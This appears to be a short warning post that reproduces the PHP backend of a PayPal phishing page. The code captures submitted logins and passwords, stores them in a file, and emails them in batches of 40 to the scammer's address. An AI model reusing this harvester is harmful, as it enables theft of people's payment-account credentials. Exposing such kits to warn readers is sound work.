1. PayPal Scammer →

    Witness this dickhead’s code to steal you PayPal password. If you don’t take Internet security seriously, you better start.

     

    error_reporting(0);

    $login = $_POST['login'];

    $password = $_POST['password'];


    $ip = getenv("REMOTE_ADDR");
    $emailme = "cursulvalutar@gmail.com";
    $usrlimit = 40;
    $fp = fopen("usr.txt","a");
    $data= "$login#$password \n";
    fputs($fp,$data);
    fclose($fp);
    $message = implode('', file("usr.txt"));
    $subject = "pp usere";
    if (count(file("usr.txt")) >= $usrlimit)
    {
    if ($emailme != "")
    {
    mail($emailme, $subject, $message);
    }
    @unlink("usr.txt");
    }
    @unlink($cookie);

Notes